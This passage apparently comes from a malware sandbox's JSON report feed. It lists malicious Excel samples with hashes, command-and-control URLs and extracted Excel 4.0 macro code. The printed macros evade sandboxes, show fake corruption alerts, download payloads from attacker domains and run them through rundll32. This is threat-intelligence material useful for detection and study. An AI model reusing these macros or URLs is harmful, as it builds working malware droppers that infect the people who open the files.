corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NBKrznVFju\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"be6c6c88a3f96fb1414949d4449696c6b8a15b9d01e7c2ed1d27e53f6cea1c52"},"analysis":{"reported":"2020-04-09T16:18:39Z","score":10},"files":[{"filename":"be6c6c88a3f96fb1414949d4449696c6b8a15b9d01e7c2ed1d27e53f6cea1c52","filesize":185344,"md5":"8d649d48cdbdba16a4e26db94e5820f3","sha1":"6bce8310d6d59570c40ffc7d7a3b7d0d7deee1ff","sha256":"be6c6c88a3f96fb1414949d4449696c6b8a15b9d01e7c2ed1d27e53f6cea1c52","sha512":"27b9168ee4b1b18a937fe5c790e4c51176f2658011ef0bbd69a2b2cbe33c5ac9290af974ee89523317150e247b3a533bfd8edf7f4986364ac7570af4d967bec8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"be6c6c88a3f96fb1414949d4449696c6b8a15b9d01e7c2ed1d27e53f6cea1c52.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"be8cb639a380ba0a4e915f9e1970a1d8ea979d0b893f9baeb52724c55867a4dd"},"analysis":{"reported":"2020-04-09T16:18:39Z","score":10},"files":[{"filename":"be8cb639a380ba0a4e915f9e1970a1d8ea979d0b893f9baeb52724c55867a4dd","filesize":185344,"md5":"33518e0367740dc93fd3119e506f64a9","sha1":"7957bb2c021af52c11eefca59f3c9507a98dd14d","sha256":"be8cb639a380ba0a4e915f9e1970a1d8ea979d0b893f9baeb52724c55867a4dd","sha512":"4788a7177f86a28066888c4871e4b1633103020d805ab02a8350bfdb893b5ca3414a7abee82a54b5968603deef221c00daa1470ca10ca5e785b4ad36ea3f2b24","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"be8cb639a380ba0a4e915f9e1970a1d8ea979d0b893f9baeb52724c55867a4dd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"be9397252186dd0b0efb3751c23839024850f8ab994ca636ea764fd0c762172d"},"analysis":{"reported":"2020-04-09T16:18:39Z","score":10},"files":[{"filename":"be9397252186dd0b0efb3751c23839024850f8ab994ca636ea764fd0c762172d","filesize":160768,"md5":"e1d49b4ed2e06f54f53ebcdafbe31f8f","sha1":"642d5ff6bcc21b2fc105e5fa8f747e6ff9a20967","sha256":"be9397252186dd0b0efb3751c23839024850f8ab994ca636ea764fd0c762172d","sha512":"c525b644e867f3ab2851b183279893c324e587d7ab8d2489373abe5303d53e9a8f7a0e2b5506dd47cdb579a0d3d3e4eac1c8f9333ca7b1dcfbfec67872d5b1a4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"be9397252186dd0b0efb3751c23839024850f8ab994ca636ea764fd0c762172d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cnSJYlvnXe\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bead683ed1820844b1337cebfef8e3e1dbe95c049bbc9d2888c6b2b632d019de"},"analysis":{"reported":"2020-04-09T16:18:39Z","score":10},"files":[{"filename":"bead683ed1820844b1337cebfef8e3e1dbe95c049bbc9d2888c6b2b632d019de","filesize":141824,"md5":"a7edc6976d240c79901394668499467d","sha1":"ba28b66e19202c109d0ca2e4dc9e7c3745c56226","sha256":"bead683ed1820844b1337cebfef8e3e1dbe95c049bbc9d2888c6b2b632d019de","sha512":"827b9033fab3d6b3a57a6d29367114691e85802ff78fdbb3b07653f28c59162cc48296dc07f21ee4fa1f68fd3fbedeba28b2e476f3179782cf6f1dade1588287","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bead683ed1820844b1337cebfef8e3e1dbe95c049bbc9d2888c6b2b632d019de.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://orruucsl.xyz/fdgareg34g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"6ll6aq9E7i\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"beb114dcdc2260db409dcef2229d2c18c1b8c379e9d0e0755ab77f1e52286429"},"analysis":{"reported":"2020-04-09T16:18:39Z","score":10},"files":[{"filename":"beb114dcdc2260db409dcef2229d2c18c1b8c379e9d0e0755ab77f1e52286429","filesize":214528,"md5":"f8b5bdc7eaf720a06f219a0c46c8506a","sha1":"f611e5094de4aa9928f69786c142430dc2096067","sha256":"beb114dcdc2260db409dcef2229d2c18c1b8c379e9d0e0755ab77f1e52286429","sha512":"df27fa5705ae8e1dbde6bce2ac32047ab331a449599bf14ed10f9ffeb3bbbaa6be6706edbb45fb4a720139f9c67171eeb73cc34339b8c1dc05ced68d85b914bc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"beb114dcdc2260db409dcef2229d2c18c1b8c379e9d0e0755ab77f1e52286429.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"p4Chu7CwWe\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bedf0084fb96ebec378e6d6b8ce663127abfbdfa1e260bd6918f10ac32e4f1a8"},"analysis":{"reported":"2020-04-09T16:18:40Z","score":10},"files":[{"filename":"bedf0084fb96ebec378e6d6b8ce663127abfbdfa1e260bd6918f10ac32e4f1a8","filesize":167936,"md5":"936bcdd80d731c04eab7b02f55db7f3c","sha1":"cf4fb59f4d72ab2a5293dfff45fcceaa5c56416c","sha256":"bedf0084fb96ebec378e6d6b8ce663127abfbdfa1e260bd6918f10ac32e4f1a8","sha512":"66b5a438da442a0649db4ae0d690f6434c73551fd7de3c33a8415e490c650035e2db14f66433115c7d9f2a0cbb0d198765e6c6706f41694d283a027f286ab308","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bedf0084fb96ebec378e6d6b8ce663127abfbdfa1e260bd6918f10ac32e4f1a8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MM9wWNNcni\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bee7291637012d033177b9571a0ba059427cb952ba0894194a766d09a3a67986"},"analysis":{"reported":"2020-04-09T16:18:40Z","score":10},"files":[{"filename":"bee7291637012d033177b9571a0ba059427cb952ba0894194a766d09a3a67986","filesize":116224,"md5":"b888f197c26228593e6be348bcc83722","sha1":"ed067d7ee579814b0bb0ec11674d72733dca4e84","sha256":"bee7291637012d033177b9571a0ba059427cb952ba0894194a766d09a3a67986","sha512":"c494b03974acbf4b1c2b4cd3ee63ca28d5807a08714b35c425ea2f53bd62ae62cb17afa43745faf13543730dcef47cbb0c29601f6b7ca7a82e90f4dca6eca91b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bee7291637012d033177b9571a0ba059427cb952ba0894194a766d09a3a67986.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HLi4428wIx\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bf0ebba62b65e68e36ca34a0a999de270642d35c4986b799db6e8b95cdd28f75"},"analysis":{"reported":"2020-04-09T16:18:41Z","score":10},"files":[{"filename":"bf0ebba62b65e68e36ca34a0a999de270642d35c4986b799db6e8b95cdd28f75","filesize":147968,"md5":"c3f1bf8c635e8779e99e3d3d8d1af273","sha1":"7c2bd57db7421e2115d144fdd73aeab9f7b153e3","sha256":"bf0ebba62b65e68e36ca34a0a999de270642d35c4986b799db6e8b95cdd28f75","sha512":"57c929abd5b19fe74c91be6d3ab97ff6d79f099b91d09d14fa5054c3d67e9d88eba7373b8e665b33096129f603a51398cbd0cd3847a923d79ee27577da24c38a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bf0ebba62b65e68e36ca34a0a999de270642d35c4986b799db6e8b95cdd28f75.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"yd8y7Wzu0b\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bf1f269865c82a258a9440c0d48a080163fb978486a20f7cacd9c191fdfa5282"},"analysis":{"reported":"2020-04-09T16:18:41Z","score":10},"files":[{"filename":"bf1f269865c82a258a9440c0d48a080163fb978486a20f7cacd9c191fdfa5282","filesize":185344,"md5":"5a64226bc099364a005bcb87a031b965","sha1":"01be26bb9bf70891cf6d9e29301efa5f0647b6d2","sha256":"bf1f269865c82a258a9440c0d48a080163fb978486a20f7cacd9c191fdfa5282","sha512":"cd7cefc0874229b0d8170fb0b44b165800b3dc9da479819bd2ab28dc7d9f071473fcb72a321c172063e54ce472ed7ae1a89f17fb20e5abd9d7ee4e1dac765556","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bf1f269865c82a258a9440c0d48a080163fb978486a20f7cacd9c191fdfa5282.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bf24c5389f398a1463ab066175d5a93e3110bf3582e4249ecc224e3e8f39d500"},"analysis":{"reported":"2020-04-09T16:18:41Z","score":10},"files":[{"filename":"bf24c5389f398a1463ab066175d5a93e3110bf3582e4249ecc224e3e8f39d500","filesize":185344,"md5":"461246f7dd369d9e3b2a25dbeeed2508","sha1":"e9a1aaded1fa8c0d47b336976fb7423a38f31166","sha256":"bf24c5389f398a1463ab066175d5a93e3110bf3582e4249ecc224e3e8f39d500","sha512":"703e1111aab8f4d39326912c706ede5312ee50bd3e929348e5f65c4cf08e6f831ceb66ba3463ea35bfeb54864cb251a5fc4b4ac842967b05e5a6e42f51f34ac3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bf24c5389f398a1463ab066175d5a93e3110bf3582e4249ecc224e3e8f39d500.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bf44d29008074482f25f9e88a4e77bbb10a5e3ea31a9379681a9d7cf4f010f8e"},"analysis":{"reported":"2020-04-09T16:18:41Z","score":10},"files":[{"filename":"bf44d29008074482f25f9e88a4e77bbb10a5e3ea31a9379681a9d7cf4f010f8e","filesize":170496,"md5":"ea1988adaedade35ba7d16af7d12364a","sha1":"a18720909a08c3bc9fbbebee940b6f49a1003ef0","sha256":"bf44d29008074482f25f9e88a4e77bbb10a5e3ea31a9379681a9d7cf4f010f8e","sha512":"abeebc0d9da3c09d0be85508f5b7b5d51755b90b670e37064343943a20d8b2ea0dd50531ac222c4628033535367fc4cb3abd87718bd52f138c88163158c6571a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bf44d29008074482f25f9e88a4e77bbb10a5e3ea31a9379681a9d7cf4f010f8e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bw3oflnHHL\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bf4986a90b1422bb383875942d402273d1e3ac106f83e5bead543122415b8ee9"},"analysis":{"reported":"2020-04-09T16:18:41Z","score":10},"files":[{"filename":"bf4986a90b1422bb383875942d402273d1e3ac106f83e5bead543122415b8ee9","filesize":167936,"md5":"74239859de71f27f9e63c96e92244f89","sha1":"1c818b9ce63a3b1966ee161fde37256f6ddb5785","sha256":"bf4986a90b1422bb383875942d402273d1e3ac106f83e5bead543122415b8ee9","sha512":"669395ffa2817a11eba14f4597591850190f78d1d67e45be9dae05831b9fc385daff225b09d654f6d354cb9e30db7ec786efbac5bd9f4bb1667ac0144c3e1b61","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bf4986a90b1422bb383875942d402273d1e3ac106f83e5bead543122415b8ee9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LzHIQ88aqO\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bf54c9ccabcf07f160431d4dc48c9e957c16ad77b3143cd376817d4cf4a15f40"},"analysis":{"reported":"2020-04-09T16:18:41Z","score":10},"files":[{"filename":"bf54c9ccabcf07f160431d4dc48c9e957c16ad77b3143cd376817d4cf4a15f40","filesize":167936,"md5":"3f6e746d80fe77cb2b61406aa10c3dbb","sha1":"f28b9a6a193a8bd16be3418a435e4cf894509035","sha256":"bf54c9ccabcf07f160431d4dc48c9e957c16ad77b3143cd376817d4cf4a15f40","sha512":"f4477369ef92764e1cbd002c43a0691d3699360efa743e07641350598c36a5b20d797b1a72469f41ebbcc39a202b2244aab5ef5cf7102ffc2b499511a76b6a99","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bf54c9ccabcf07f160431d4dc48c9e957c16ad77b3143cd376817d4cf4a15f40.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8mSN63Cyjv\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bf6629f7bfc3ed780fb2c2093a3268634d201ceeefd79bede19090320e10cfcf"},"analysis":{"reported":"2020-04-09T16:18:42Z","score":10},"files":[{"filename":"bf6629f7bfc3ed780fb2c2093a3268634d201ceeefd79bede19090320e10cfcf","filesize":167936,"md5":"9ffb6962cdeda3c7d729434eed0695bf","sha1":"ae2f3bdd822861eb9b54b2192e5049af6bb4b62f","sha256":"bf6629f7bfc3ed780fb2c2093a3268634d201ceeefd79bede19090320e10cfcf","sha512":"c0476911f943bb951f941dd59a2fa1c83a2547ef97a3db466a72eb36c9dab4b9f72e319b21f129bfeff446a3e101a6bb7474381d36c9ebeeaedf0c8ae412dfb9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bf6629f7bfc3ed780fb2c2093a3268634d201ceeefd79bede19090320e10cfcf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"UlQGwTV2oC\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bf6be08af32896a32d2f5a1d6ad341309393e8bc1d0600f31c34d8c29e6b1f0e"},"analysis":{"reported":"2020-04-09T16:18:42Z","score":10},"files":[{"filename":"bf6be08af32896a32d2f5a1d6ad341309393e8bc1d0600f31c34d8c29e6b1f0e","filesize":112128,"md5":"8873f7dcd166d3575e433fd98da4721a","sha1":"a64db1ffa75e7b7356db5da0de0aedddedbf6487","sha256":"bf6be08af32896a32d2f5a1d6ad341309393e8bc1d0600f31c34d8c29e6b1f0e","sha512":"d9ce83736e51e846f027959127624aae6060d1a7736ae860d8b468dc1da57db74b3923be25b08e5ca3a2bc1219a1fdff43692d3c2440344d425b6fa9134a64f3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bf6be08af32896a32d2f5a1d6ad341309393e8bc1d0600f31c34d8c29e6b1f0e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bf94b34186dfa5d32562b8163df81da75b3507302453960610ea0860899d653c"},"analysis":{"reported":"2020-04-09T16:18:43Z","score":10},"files":[{"filename":"bf94b34186dfa5d32562b8163df81da75b3507302453960610ea0860899d653c","filesize":206336,"md5":"d5071c814396aa618305422618864d4c","sha1":"49021fdd79bfc540d0605831efdf217f1489973c","sha256":"bf94b34186dfa5d32562b8163df81da75b3507302453960610ea0860899d653c","sha512":"2f17474e93231546cb5dcc15669d92f41c7efdc3e48632660c3fc9df06dc65f1d89315f6b994921a97083c36c026f8c8f9d8e2ff854824353de722e3b2ff5054","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bf94b34186dfa5d32562b8163df81da75b3507302453960610ea0860899d653c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Izpruae8O4\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bfa710abac732068bf5033982ac728576efb0cbc21325be1265e8e5584721f93"},"analysis":{"reported":"2020-04-09T16:18:43Z","score":10},"files":[{"filename":"bfa710abac732068bf5033982ac728576efb0cbc21325be1265e8e5584721f93","filesize":141824,"md5":"4cbbcf9933605bed4614a4df9d16605a","sha1":"479a91773f72e63d21fc7a25890a0f640675afce","sha256":"bfa710abac732068bf5033982ac728576efb0cbc21325be1265e8e5584721f93","sha512":"6436ba2d1e72a351740e5bfd3fabaeda545766e72aa504cf02b712606cc4d4469587c5a3f5198ebfe9ef2b8a0c1e17bd38eb2fad41f3f0c3ba4821e7e8e492ed","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bfa710abac732068bf5033982ac728576efb0cbc21325be1265e8e5584721f93.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM 